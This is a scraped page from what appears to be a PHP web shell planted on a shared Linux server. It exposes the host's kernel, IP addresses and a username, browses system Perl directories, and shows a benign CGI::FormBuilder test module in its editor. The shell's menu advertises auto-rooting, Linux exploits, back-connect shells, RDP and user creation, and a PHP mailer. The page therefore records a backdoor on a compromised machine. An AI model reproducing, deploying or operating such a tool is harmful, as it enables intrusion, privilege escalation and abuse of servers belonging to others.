Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
CGI /
FormBuilder /
[ HOME SHELL ]
Name
Size
Permission
Action
Field
[ DIR ]
drwxr-xr-x
Messages
[ DIR ]
drwxr-xr-x
Source
[ DIR ]
drwxr-xr-x
Template
[ DIR ]
drwxr-xr-x
Field.pm
34.79
KB
-rw-r--r--
Messages.pm
9.96
KB
-rw-r--r--
Multi.pm
10.88
KB
-rw-r--r--
Source.pm
3.2
KB
-rw-r--r--
Template.pm
6.26
KB
-rw-r--r--
Test.pm
1.38
KB
-rw-r--r--
Util.pm
14.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Test.pm
########################################################################### # Copyright (c) Nate Wiger http://nateware.com. All Rights Reserved. # Please visit http://formbuilder.org for tutorials, support, and examples. ########################################################################### package CGI::FormBuilder::Test; =head1 NAME CGI::FormBuilder::Test - Test harness for FormBuilder =head1 SYNOPSIS use CGI::FormBuilder::Test; my $test = 1; for (@tests) { my $outfile = outfile($test++); } =cut use strict; use warnings; no warnings 'uninitialized'; use CGI::FormBuilder::Util; our $VERSION = '3.10'; our $DEBUG = 0; use Exporter; use base 'Exporter'; our @EXPORT = qw(outfile); use File::Basename 'fileparse'; use File::Spec::Functions; sub outfile ($) { my($file, $dir) = fileparse($0); $file =~ s/-.*//; # just save "1a-", "3d-", etc my $out = catfile($dir, sprintf("$file-test%2.2d.html", $_[0])); open(O, $out) || warn "Can't open $out: $!\n"; return join '', <O>; } 1; =head1 DESCRIPTION =head1 REVISION $Id: Test.pm 100 2007-03-02 18:13:13Z nwiger $ =head1 AUTHOR Copyright (c) L<Nate Wiger|http://nateware.com>. All Rights Reserved. This module is free software; you may copy this under the terms of the GNU General Public License, or the Artistic License, copies of which should have accompanied your Perl kit. =cut
Close